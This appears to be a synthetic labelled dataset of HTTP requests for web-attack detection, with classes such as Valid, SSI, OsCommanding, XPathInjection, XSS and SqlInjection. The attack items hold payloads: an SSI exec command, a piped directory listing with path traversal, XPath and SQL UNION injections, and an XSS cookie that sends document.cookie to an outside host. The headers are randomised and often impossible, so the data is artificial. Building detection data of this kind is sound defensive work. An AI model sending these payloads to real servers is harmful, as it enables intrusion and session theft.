Cookie: eppki0ffblyV=tmpihne;_WLJ=9it1;execPJ.=152701523;bxolmRToi=psobd8tgmthtaccestMsqW;Otorr3odtiwi=2875110;hfunnzr=31461433
Cookie2: $Version="793"
Date: Sat, 03 Jan 04 17:41:49 UTC
ETag: W/"NYxcBqjIFCeg3fhWJ"
Expect: ksdnis=ef4r;otk5abdh=easp
From: iedsurn@koroi.net
If-Modified-Since: Thu, 30 Oct 08 22:40:11 UTC
If-Unmodified-Since: Sun, 13 Sep 09 24:22:18 GMT
If-Match: *
If-None-Match: *
If-Range: "fnCrViKzhCMBzfZi"
Max-Forwards: 851
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic VHJzRDZtZTpzN2xldGl3cg==
Authorization: NTLM cm9kZWR3dzF0MFJoYWZ0b3JyaTlzZW90T2NieHVpckNyaDV0ZXZyb2Fob2xyaWU=
Range: 90-,49-617
Referer: /nont/hadtd.jpeg
TE: gzip;q=0.2
Trailer: Trailer
User-Agent: egoibao/5.9.8
UA-CPU: PowerPC
UA-Disp: 987,566,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4426x0282
Via: 4.2 252.85.51.22, HTTP/2.1 www.fst6hpli.tiff
Transfer-Encoding: gzip
Upgrade: 6ed/7.0
Warning: 316 www.deemx.htm:8305 "btsydnansow" 
X-Forwarded-For: 238.108.237.191
X-Serial-Number: 467341
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23519
Start - Id: 40293
class: SSI
GET /sy.htm?2qUloga_kVmailk=l36&eadSealcafqaiaa=28330&EyYxL=tmpiEEo&l_childAyGmpassthrubPW=I&0df3onm=%3C%21--%23exec+cmd%3D%22c%3A%5Cprogra%7E1%5Cmdzdsh3er%5Cle%5Ce0e.exe++++d%3A%5Cwwcsfe3aio%5Cwww.rameer.org%5CdkmhK%5Cdatabase.mdb+++++%2Fx++exporttofoxpro%22--%3E&UDeahotttnROo=abu%40flbL_KWt&56Ab3hsock_stream@@exec=llE HTTP/1.0
Host: www.d7rcnvJ.ch
Connection: close
Accept: application/*;q=0.7
Accept-Charset: windows-1255, windows-1255, x-mac-korean;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: 3cffee2N-e0rt;q=0.7
Cache-Control: no-store
Client-ip: 10.192.46.139
Cookie: leeisrU4a=bMw8-5r1u2_;adfdhv6M=~ser@;psst=dyJ2wiIA;hcdheAHneqtNzi5=teglo3f4i;thp9th=nebin4boot.inifZAkm'j;rnsbva=hhl2sgrzexeoki
Cookie2: $Version="416"
Date: Tue, 07 Jul 09 04:18:35 GMT
ETag: W/"cZahXkYy1L59OAb"
Expect: ltnpse
From: sinl@n3biht.ch
If-Modified-Since: Sun, 06 Nov 05 12:31:26 GMT
If-Unmodified-Since: Fri, 06 Jul 07 11:48:26 UTC
If-Match: "ChbBg84reec1gBQ5Htl"
If-None-Match: "5BC@s8Xh_xvT25ly"
If-Range: "PHyY9dc1tgh1y@K"
Max-Forwards: 46
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: oeos goaweqW=tqMehbrx
Authorization: Basic ZGFrRmVvY286c2EwZQ==
Range: 5-
Referer: /otdwlo/2shkov/Eigr/fieqeej8/h1renhAc.msf
TE: trailers
Trailer: Connection
User-Agent: up1vGDtKNf http://www.enieatru.uk
UA-CPU: MIPS
UA-Disp: 2515,7751,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2184x777
Via: 8.0 www.aEltsa.jpeg, HTTP/7.9 46.135.1.61, 6.5 202.112.245.234
Transfer-Encoding: compress
Upgrade: hiCkrp/2.9, tclcr/7.7, ntp5/3.3, her/1.8
Warning: 559 www.x4kdcw.js "6b1la22lnngto" 
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 62707296438769057176
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40293
Start - Id: 36558
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: www.vtEnui.biz
Connection: keep-alive
Accept: video/*;q=0.6, application/rtf;q=0.1, image/*;q=0.5
Accept-Charset: x-mac-turkish;q=0.3, koi8-r, x-mac-greek, x-mac-chinesetrad, iso-8859-2;q=0.1
Accept-Encoding: identity;q=0.5, deflate;q=0.2
Accept-Language: o-neup, a4otlyai-tusscf;q=0.8
Cache-Control: min-fresh=27
Client-ip: 197.131.59.208
Cookie: j6WQKtdR=d_B7U;madsn=lrRnszyaaS9'i;fnwt0=53888
Cookie2: $Version="25"
Date: Wed, 15 Jun 05 05:26:31 GMT
ETag: "._sHr99T4AKY.QbUteoU"
Expect: ft7A=n8gttEd;crsu
From: h8IMoanr@hlhircha.ch
If-Modified-Since: Sun, 12 Nov 06 19:21:23 GMT
If-Unmodified-Since: Sat, 22 Dec 07 17:03:41 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 63
MIME-Version: 5.7
Pragma: Q='faaoepns'
Proxy-Authorization: Digest nc=Ad95328B
Authorization: e7kTa pefo=hIoR
Range: -7292
Referer: /ahteo/bc7inni/Ioke/s4t6dt8t.css
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/9.2 (X11; U; Unix 9.1; 6e-pb; rv:8.0.4) Gecko/61965505
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 547x5195
Via: enogs/8.6 www.tetqra.jpg:2, 3.7 196.40.24.71, 6.1 www.2pocs.jpeg
Transfer-Encoding: deflate
Upgrade: syjne/7.2
Warning: 384 103.114.33.177 "eR8ioli" "Sat, 15 Oct 05 19:32:06 GMT"
X-Forwarded-For: 232.88.214.55
X-Serial-Number: 33496662681000
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36558
Start - Id: 48528
class: XPathInjection
PUT /otsihtlnivfs/eemkevxtek9aeteuCcln/reomFmh6aeanB/ybhosbn4rmu.jsp? HTTP/1.0
Content-Length: 130
Content-Language: c
Content-Encoding: deflate
Content-Location: http://www.lbtz2eae.biz/ToEnen.wav
Content-MD5: dWF0aHluZW9ldGE0ZXN0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Feb 10 05:35:39 GMT
Last-Modified: Thu, 20 Jan 05 18:36:12 GMT
Host: www.tfedy.cz
Connection: close
Accept: */*;q=0.2
Accept-Charset: us-ascii, ks_c_5601-1987, windows-1255;q=0.7
Accept-Encoding: 
Accept-Language: edroa9-gjbhhc3;q=0.9, rzdlmgl-sttd6;q=0.3, tP-fEcdo5;q=0.4, Lo-nsuE9;q=0.4, l3w-hytn
Cache-Control: no-transform
Client-ip: 210.55.17.62
Cookie: erb=rno6arn;e8fNyedo=li6;F1X.zorWpvYiH=a
Cookie2: $Version="5"
Date: Sun, 26 Nov 06 13:31:42 GMT
ETag: W/"tBZi-pENw9GtkAl"
Expect: 100-continue
From: hpeced@ekqiej.it
If-Modified-Since: Fri, 03 Mar 06 20:33:26 GMT
If-Unmodified-Since: Thu, 01 Feb 07 09:27:50 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 03 Jun 07 13:56:17 CET
Max-Forwards: 652
MIME-Version: 9.6
Pragma: aScsv='Tha8eBn'
Proxy-Authorization: mtlwdi eSfIe=ftEqwcOT
Authorization: mtoht Tturpk=eefhirah
Range: 51-93,35-2637,65821-
Referer: http://it52.net/wnIJneni/qoeTncet/ddsn/hfdqrf/tywstk.tiff
TE: trailers,chunked,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/5.7 (compatible; Konqueror/8.8; Mac OS X; munr; cimufne)
UA-CPU: x86
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3038x174
Via: FTP/6.9 www.rl22ie.jpeg
Transfer-Encoding: gzip
Warning: 437 242.254.172.181 "wwyyel6" "Tue, 23 Aug 05 14:58:53 GMT"
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

eebnEextifccpt=6yevy'  or  1< tot/8iaatt/aer/child::text()[position()=8]  or   'qs5tUet'    ='

End - Id: 48528
Start - Id: 16767
class: Valid
GET /Omlefe1r/uwYP-h6AKX/netyko/yeak/loamroee/LpLrFAyUYVW/dZelw2i5L1dd/fyhdrnowliloo/gzjMoGIdJIwHDbj36jT/HiQ3aC7.cfm?esisaxeao8ysiuh=cUpsO9IlAYVA&8ise5n=%3Cig HTTP/1.1
Host: www.8tb5.biz
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-4;q=0.9, gb2312, x-mac-turkish, us-ascii;q=0.5
Accept-Encoding: compress;q=0.3, compress, deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 122.249.32.229
Cookie: yoex=I';Dt6n=e;scsieiAtisoq=597;59n5oatf=rIIe s
Cookie2: $Version="8"
Date: Mon, 20 Nov 06 15:50:07 CET
ETag: "J-jyQUJFX5X5GVI"
Expect: 100-continue
From: tAgim@uoet.gov
If-Modified-Since: Fri, 27 Apr 07 11:51:42 UTC
If-Unmodified-Since: Thu, 25 Jun 09 15:45:22 UTC
If-Match: *
If-None-Match: "kVa4P4Vm5xNZ0rYbw"
If-Range: Sun, 14 Oct 07 21:50:27 UTC
Max-Forwards: 099
MIME-Version: 3.9
Pragma: l='iind'
Proxy-Authorization: NTLM YWF3ZUVudHVkc0JvaGVodHN5d2V5OHNhcm9iZWVzbGE=
Authorization: NTLM dGJ3emFlc29lY29sdXN0VFJod2lhYXF1cHdFdHd5ZXM3dnVvc2RxZQ==
Range: 73855-,-7357
Referer: /itxt4tot/oU5weo/wttaul/5naoetxd.ace
TE: trailers,chunked;q=0.7
Trailer: Accept-Encoding
User-Agent: kDa7nu (74Vu.EBWz; me_8FyJ; tZai.fo; du.iaD5S; o62muU)
UA-CPU: PowerPC
UA-Disp: 9450,977,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8734x738
Via: 3.8 220.106.111.153, 4.4 www.tstOtoaL.jpeg:98486
Transfer-Encoding: gzip
Upgrade: werr/0.1, nehc/6.8, ief/7.3, dsoe/2.7, mmnl2e/1.6
Warning: 512 93.163.50.162 "gen9b" "Thu, 14 Oct 04 24:38:21 CET"
X-Forwarded-For: 38.253.106.148
X-Serial-Number: 00770838075
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16767
Start - Id: 46659
class: XSS
GET /CenOtueed8roj/teuus/oddoad.php?etMdrakZh=%7En&phpusrNdropbodytmp8FD9k=O7acw&ACkNDFTVQ_=latrf&8tid1wc9Lwh=eeieaaniisp&soeeIantcn=%3Brloe+9bue&lr=ooean7fjrv&7Bx99tfeh=m-7NodIJ HTTP/1.1
Host: 233.188.41.51:80
Connection: close
Accept: application/rtf, application/*, video/*
Accept-Charset: *
Accept-Encoding: compress, deflate
Accept-Language: t-hmqeeIn, 419wise-omn;q=0.2
Cache-Control: only-if-cached
Client-ip: 8.25.60.100
Cookie: Opsb=aX2mDrru;DkMvVEDpk3z=dopa;rmirtTekea=<div    style    = "    background-image:     url(javascript:[document.location.replace   ('http://www.ericte.com/cgi-bin/stse.cgi'+document.cookie);]); ">;memmvzietgndkh8=14176;eAtu.dsm3OZ5=snatHinqiprntiih;nxlOzonOefat=et
Cookie2: $Version="45"
Date: Sun, 03 Jun 07 24:37:41 GMT
ETag: W/"UZZb2JZhOTt71FjvfCKp"
Expect: ebrmdn=eOsneu;lnwdu
From: iam9mt@lo1hek.gov
If-Modified-Since: Thu, 10 Sep 09 22:19:50 UTC
If-Unmodified-Since: Sat, 02 Dec 06 05:27:40 GMT
If-Match: "4ox-75plwBFcoou"
If-None-Match: "cNaMXmbMfNLiArZ4"
If-Range: "ej6EIprMWm9lW666"
Max-Forwards: 7074
MIME-Version: 0.5
Pragma: AFeqt=3hse
Proxy-Authorization: NTLM eTVpdDM2dHdnbnN6ZWRzZWQ5Y29lbGpFcmVzdHRvd28=
Authorization: Basic Z21waWlpdjpub3JrdA==
Range: 80-
Referer: http://www.iCeeoRt.cz/o22w/exom/gtmdj/sg0te.nsf
TE: deflate;q=0.8
Trailer: Accept-Encoding
User-Agent: Mozilla/6.5 (X11; U; Open BSD i386 0.3; oi-eq; rv:6.5.1) Gecko/98269581
UA-CPU: PowerPC
UA-OS: WinNT
UA-Color: color16
Via: 4.2 www.aInt.jpg
Transfer-Encoding: compress
Upgrade: pesis/7.5, lqrttT/4.6, bTsote/3.0, cstc/2.2, peotn/4.0
Warning: 466 152.152.48.226 "ecjo" 
X-Serial-Number: 64753281
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46659
Start - Id: 34476
class: Valid
PUT /mwcore/tRi/slJG/dSECOrIPJlDp.msf? HTTP/1.0
Content-Length: 89
Content-Language: h3o1tets
Content-Encoding: gzip
Content-Location: http://nqeaTtp.org/sie4.jsp
Content-MD5: Z2VtaWV1ZXhSZTJob3RVOA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 May 09 18:07:23 UTC
Last-Modified: Sun, 12 Apr 09 18:51:14 CET
Host: 30.75.115.101:80
Connection: Vors6ai
Accept: */*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.0
Accept-Language: z-ns, a8oaui-u65aio, tweeieor-anstnC, os-csDj;q=0.0, dief2x9-g;q=0.1
Cache-Control: max-age=3
Client-ip: 129.193.110.22
Cookie: 5u7otnx=94503134;wLre5rnn3= stdin;LS-FCaHx3RY=aool;bedtsnttetdu=9187133751
Cookie2: $Version="55"
Date: Sat, 01 Aug 09 07:26:06 CET
ETag: "zliJNmsgq8S2bYr0j@cv"
Expect: 100-continue
From: nS63m@sntnm9.biz
If-Modified-Since: Sun, 24 Aug 08 07:53:05 GMT
If-Unmodified-Since: Tue, 13 May 08 15:41:13 CET
If-Match: "6CTgc0YJ-I5rn1AJgto"
If-None-Match: *
If-Range: "jAVCALjkpPKw3h85h@"
Max-Forwards: 766
MIME-Version: 3.2
Pragma: oes=fae
Proxy-Authorization: Basic YXROYWRlZTpuZTdy
Authorization: Digest algorithm=7sede
Range: 152369-
Referer: http://rbnew.ch/siib/j2seia/ltspirs/yoafono/na1satg.sh
TE: chunked
Trailer: Upgrade
User-Agent: e1iXowP http://www.onwp.uk
UA-CPU: StrongARM
UA-Disp: 563,2938,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3150x9630
Via: acd/0.7 55.213.51.137:36
Transfer-Encoding: deflate
Upgrade: iuz/3.7, jesoaa/1.4, tOf/6.2, nred/2.1, chltis/1.5
Warning: 744 6.64.198.232 "tn0reonbisinddiie" 
X-Forwarded-For: 63.206.208.126
X-Serial-Number: 274973050
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iheiha=lalenbte&9iEaUna=0710&tleizgttR0=6&fEX=ecvonwoNiennmo&2Htu= i&KM5nkLtnodeY=WlmsEgk

End - Id: 34476
Start - Id: 34317
class: Valid
POST /Xhnod/sz1oe8d2gorfhrv.shtml? HTTP/1.1
Content-Length: 104
Content-Language: dbgtbnrm,rcstZ,sc
Content-Encoding: identity
Content-Location: http://ae2ndCe.be/husyt/otil/ulylztke.dll
Content-MD5: aTFnaGNpOUh2Zmxpb3pvNw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 29 Dec 07 10:40:50 UTC
Last-Modified: Sun, 13 Aug 06 23:22:38 GMT
Host: 215.203.152.12
Connection: close
Accept: text/plain;q=0.7
Accept-Charset: iso-8859-5;q=0.2, iso-8859-6;q=0.7, iso-8859-4, iso-8859-7
Accept-Encoding: *
Accept-Language: t8s-ynd;q=0.9
Cache-Control: s='cr2dN'
Client-ip: 28.152.174.188
Cookie: fkcopyk9=100;aoanY=edtwi8doju9zeRvAaG;NIcopyB=-
Cookie2: $Version="975"
Date: Mon, 06 Jun 05 10:51:49 UTC
ETag: "oCWYxdxSE.sRjMMagk8"
Expect: dhub
From: viamr6@yergvcA.biz
If-Modified-Since: Tue, 03 Aug 04 07:17:33 GMT
If-Unmodified-Since: Mon, 24 Oct 05 21:59:43 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Feb 07 17:58:18 CET
Max-Forwards: 513
MIME-Version: 1.2
Pragma: si='otorL'
Proxy-Authorization: NTLM aU9yd2hldW1uZ3RycnFtdUhqZUE0b3U5cmVzdGJyc3RhZTFnYWk1bnZveWVMbQ==
Authorization: uuwW bT2js=Eepetl2t
Range: -278160
Referer: http://eEii4z.fr/csLl.jpg
TE: trailers,gzip
Trailer: Authorization
User-Agent: uoma0atfyre3n24e8r7y
UA-CPU: Sparc
UA-Disp: 693,674,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 232x3371
Via: aeTtst/9.6 114.12.34.91, 5.5 195.4.218.188, 7.3 www.fnh5.gif
Transfer-Encoding: gzip
Upgrade: iewoh/8.9, Tilhka/5.1, irihoc/2.3
Warning: 043 www.eepu.css "fuina4" 
X-Forwarded-For: 252.208.59.218
X-Serial-Number: 57690312658
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SFf4Hh=iLwsvrg&aduE1Mgeaen1n=eme&jienaoTtdsmhee=rnNo&amaaksouptt7mhN=a5a&rpmtd=Osi6tiTao&I1=r5its3ietiea

End - Id: 34317
Start - Id: 35163
class: SqlInjection
POST /oqdKMzuDLp2wl0/sAxDcJCopGWd.asp? HTTP/1.0
Content-Length: 284
Content-Language: aeogan
Content-Encoding: identity
Content-Location: http://www.rue1ms2e.net/tod0h/Ejpanbn/9euteo/hsEtmlx.exe
Content-MD5: bnpOY250bWJud21jdGltZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 20 Jun 04 20:30:38 UTC
Last-Modified: Fri, 29 Oct 04 21:14:49 CET
Host: www.tlwy.gov
Connection: keep-alive
Accept: audio/*
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=2822
Client-ip: 233.147.59.197
Cookie: nteu=44391075;natNitqg=nmm;up7t=2178091712
Cookie2: $Version="54"
Date: Mon, 02 May 05 16:25:17 GMT
Expect: 100-continue
If-Modified-Since: Mon, 21 Aug 06 07:09:35 CET
If-Unmodified-Since: Sat, 12 May 07 19:36:54 GMT
If-Match: "NUg_u81tc@oOp2-6TtTn"
If-None-Match: "jzHpNuQ2VbUKjXJ"
If-Range: Thu, 06 Oct 05 04:02:13 UTC
Max-Forwards: 5
MIME-Version: 2.2
Pragma: wgPh='2'
Proxy-Authorization: Basic cXRzZTpvcXBh
Authorization: idwar Ss5M78=odfinj
Range: -726192,3030-
Referer: /oln4.aspx
User-Agent: 0y0s (nVw8Nbqz; hrYnZriz)
UA-OS: Linux
Via: 5.2 www.gimvte.shtml:40474, 7.9 217.9.21.157
X-Serial-Number: 9084516
----: --------------------------------
~~~~~: ~~~~~~~~~~

0etcmULg8@pw=nig&nrmh8=ferta$ttroxmln1aMrmrtt/&fHahreysrcdHhed=iVwO6Ao.v&wFSVNdocumentzrgn='    UNION       ALL          SELECT ielwc3f  FROM   quoTfiO   WHERE   ''   ='&ds=ptsi&3zsaAtezsbimca=Gddreaetci]iNcbetweentoa&CbejlbCQIfromf=qFk5@apoWr&ten2oIethi=zrtsreplace

End - Id: 35163
Start - Id: 6850
class: Valid
POST /KTvMnetcat19.9/m0d/tehnpOnnsenIqeaeErx1/idShseymsinMaApVjoiT/IU40EgV/qSIRFz3rjwp-mftpmailY9/Xe00wftnD/nfRDin0aaHdhugrliweG.bin? HTTP/1.0
Content-Length: 71
Content-Language: Tcle,Ete3sf2i
Content-Encoding: gzip
Content-Location: http://m4temioe.st/n6haeth/Necai6/shrhM.asmx
Content-MD5: dGNlYXRzSWFneXRvRWVpMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Apr 06 22:04:06 UTC
Last-Modified: Thu, 14 Oct 04 20:37:17 UTC
Host: www.NsnOaeeus.net
Connection: fckp
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 236.244.233.99
Cookie: 1whereQiw=H;eer=06471561;genhnoi=coTwNpsl;mrn7C8naqae=4ye;atAhsqchALR=st2a$t inrctj
Cookie2: $Version="0"
Date: Fri, 14 Jan 05 10:52:28 CET
ETag: "ns947wAawLAMs@c"
Expect: p7oissr
From: dbae4ti@tmraxarsak.gov
If-Modified-Since: Wed, 08 Jul 09 13:58:20 GMT
If-Unmodified-Since: Sun, 25 Nov 07 04:13:49 CET
If-Match: *
If-None-Match: "Cj-2KbXMs4_u5Kq5"
If-Range: Sun, 12 Dec 04 01:47:32 GMT
Max-Forwards: 4201
MIME-Version: 7.3
Pragma: hSew='rwagrh'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM Tm9uMXZsaXNlbWdhNnl2dHRzeWlSc3ByUnRzc1JpMmIyaHVpaGhp
Range: 708-,54-
Referer: http://vlc0a.com/01HaMw/oebn/Texnemam/eGreey/evmjean.swf
TE: trailers,chunked
Trailer: Range
User-Agent: hkron7afi/5.4.6
UA-CPU: Sparc
UA-Disp: 0985,7140,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 302x0187
Via: FTP/4.7 45.8.87.171, ehemyh/9.1 57.117.224.22, 0.5 147.244.208.247
Transfer-Encoding: gzip
Upgrade: iu6a/3.8, del/4.7, tea/8.2
Warning: 129 www.9lvodtr.jpeg "nTtwlNvsm" "Wed, 13 Dec 06 13:48:45 UTC"
X-Forwarded-For: 225.78.188.108
X-Serial-Number: 036513993463
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

zDB-connectunodeopt=5683174&j-Zm=525&cwzxp_n= inserti nos 6ei=jlsenrl

End - Id: 6850
Start - Id: 2714
class: Valid
GET /tsEl/prli/sMn1FJKPX-/uklo2r0veljwddtDo/c3smpZ3k_Q-ggLuoAy1/Klib2aaMRoWgpsw/aQerrAnpixrioeadmhrt/vCVc/xp_6-l/fmcLoopN3/4gRF/6cAuJ.shtml?SE-HHpNvgy=e75%3Er1i&DuCF_wcuCT=19&mcsoAqOtseh=tno%3Cuq&mr8=0&ud=rwperlale HTTP/1.0
Host: 12.145.170.82
Connection: keep-alive
Accept: text/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 118.196.176.82
Cookie: anjm=78453461;asaSleniod=ott+;EEr=771599;rqax6= n%mNs&o$-4
Cookie2: $Version="39"
Date: Wed, 05 Mar 08 17:04:49 GMT
ETag: "RKKL@1pDaFebBqB"
Expect: matihte=7pwmDa
From: elaee@z3vnA8l.ch
If-Modified-Since: Mon, 23 Mar 09 22:21:29 UTC
If-Unmodified-Since: Tue, 12 Aug 08 03:33:59 CET
If-Match: *
If-None-Match: "RPjLP8UPGI3ClkvIwGgI"
If-Range: Mon, 15 Mar 10 14:19:40 GMT
Max-Forwards: 836
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: hnknte 6dhe=ailltedl
Authorization: Digest opaque="heyaRile"
Range: 800-526712,0803-
Referer: /oA6raiai/Heyisl/2sAv.js
TE: gzip;q=0.8,trailers,deflate;q=0.2
Trailer: Expect
User-Agent: Mozilla/6.5 (Windows; U; Win 9x 6.3; td-os; rv:5.7.0) Gecko/05220676
UA-CPU: 68000
UA-Disp: 153,380,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 486x934
Via: 4.1 23.96.236.139
Transfer-Encoding: gzip
Upgrade: foys/2.8, sSboa/7.3, alt/9.7, arhxe/9.3, g5ee4a/9.9
Warning: 722 219.161.37.147 "eueen5o9vYS" "Tue, 30 Aug 05 03:30:07 CET"
X-Forwarded-For: 185.239.118.59
X-Serial-Number: 053261538285243
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2714
Start - Id: 25110
class: Valid
GET /linkgSNu/yrV/g5hngnmeu.swf? HTTP/1.1
Host: 219.70.173.131
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: windows-874;q=0.9
Accept-Encoding: 
Accept-Language: 92rffnde-6ag, nhaai-ramrnca, tmStnh-ewae;q=0.7, iileet2o-sadxe;q=0.2
Cache-Control: min-fresh=70
Client-ip: 117.225.208.11
Cookie: eai4moer=1494;plxxftjde=953663191;ihoyzxDsOem=84
Cookie2: $Version="7"
Date: Sun, 12 Apr 09 20:05:17 CET
ETag: W/"Ivp.M@cp06Ze4hsPTuxS"
Expect: sJrh=kltenase;itik
From: hixb@siilehs.org
If-Modified-Since: Thu, 25 Nov 04 13:12:02 CET
If-Unmodified-Since: Mon, 02 Jul 07 10:00:54 GMT
If-Match: "L5kwtRor3syBqCZ8_"
If-None-Match: *
If-Range: Wed, 16 Dec 09 01:02:17 UTC
Max-Forwards: 184
MIME-Version: 5.6
Pragma: Fo=leih
Proxy-Authorization: Basic aWdycTA6YXRpYWFpbw==
Authorization: jo4aa o0itnhst=Isami
Range: 418-75506
Referer: /nnTrec/w8ttfSht.pl
TE: deflate,trailers
Trailer: Accept
User-Agent: Mozilla/0.8 (X11; U; Open BSD i386 1.2; zo-uA; rv:2.5.3) Gecko/28204380
UA-CPU: PowerPC
UA-Disp: 9555,789,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 350x680
Via: 5.2 9.164.91.32, FTP/6.3 www.AoinnDa.shtml
Transfer-Encoding: ohsre
Upgrade: riw/2.4, BMho5n/6.3, e2h/8.4, twi/5.4, 4io/2.3
Warning: 856 www.otgia.css "oabfnoRfoehnueGi" "Tue, 04 May 10 20:01:11 GMT"
X-Forwarded-For: 31.113.199.2
X-Serial-Number: 714579
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25110
Start - Id: 22170
class: Valid
GET /6nfhrgteoa9eekT/uosaoahehmioyNo/egrsubaatoNqtai/tevhlAiTit/M-EhtaccesbinAnaJoVaK.exe?na=t5&7logcmdVa30N-=3780&ehtdinmcpo=%29riom&i8c3eaeLtjlxE=90730364&Uooceo4net8utr=8688398&anraanra=%29n&in8MptmpstylerkD7=ou7r HTTP/1.1
Host: www.trRoRt.org
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-chinesetrad;q=0.4, x-mac-turkish;q=0.4, euc-tw;q=0.4, windows-1258
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-age=04079
Client-ip: 21.99.62.109
Cookie: 2tprsmiye=46314;cncr= 
Cookie2: $Version="9"
Date: Tue, 09 Oct 07 15:28:45 CET
ETag: W/"NCb_-30WhdXuLYgMiq"
Expect: 100-continue
From: wiKeelga@iawciImato.be
If-Modified-Since: Sun, 23 Mar 08 03:26:58 GMT
If-Unmodified-Since: Wed, 22 Jun 05 19:02:19 CET
If-Match: *
If-None-Match: *
If-Range: "iGMb8EtlwCioeK7"
Max-Forwards: 9818
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: frls dscr=zajryd
Authorization: Pnsis etyeeA=atm90uy
Range: -8,26857-
Referer: http://iqiifoir.it/xEex.jsp
TE: trailers,trailers,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/5.3 (Machintosh; U; PPC 1.8; tt-lt; rv:4.1.8) Gecko/00485567
UA-CPU: x86
UA-Disp: 863,374,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 850x114
Via: HTTP/7.4 www.16emSbx.png
Transfer-Encoding: deflate
Upgrade: rnlh/4.1
Warning: 398 124.40.7.234 "EEnlnaotsirs0" "Fri, 15 Oct 04 03:31:48 GMT"
X-Forwarded-For: 26.89.57.129
X-Serial-Number: 89307518698
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22170
Start - Id: 31949
class: Valid
GET /apd/gZqUTO.t/Hscvhsu7sesggrmagadt/rlfenveisoteobha/h4rU35GA/toaa1sfnho6/5adedns56Hn4huoil6a/jZu-bomv/7oaerjprCRorn0yS/cln.exe?pslazgtjsh=o+3a9%5Da&rsNafkhb=763&kiekswatl=o%24ytbu&qdprocessing-instructioncopyropen7telnet=tOWNDsBgfCKL&9salieesslE=hqQswLZZS&3RXDNdKC=ulH1pFPN%40&ean=pir&ahx=5719996046&Tkhnt7e=965490 HTTP/1.0
Host: www.pznerGf09a.org:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: euc-cn, x-mac-roman;q=0.3, iso-8859-2;q=0.7
Accept-Encoding: compress;q=0.9, compress;q=0.9, gzip;q=0.4, deflate
Accept-Language: e-sg7the, B-w, aitsd8-hrm;q=0.7, sh-Adp2
Cache-Control: max-stale
Client-ip: 114.29.153.102
Cookie: esoe=biA;ezrsigalsmk=oyasijvFlwa4schd;i8VVNn=72817;daftp9ierbtem=w;zis= rtwinnt
Cookie2: $Version="097"
Date: Mon, 25 Jul 05 24:22:04 CET
ETag: "vMcUI3iNgXpZhcM"
Expect: 1lNaie
From: h4ras@eu8lf.gov
If-Modified-Since: Wed, 01 Dec 04 13:04:58 GMT
If-Unmodified-Since: Thu, 30 Jul 09 04:27:57 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 72
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: NTLM ZXJyWGU4c2VtZDhhZWVlbnVsM2dlODF0bHJyb2xvdmFzZWQ=
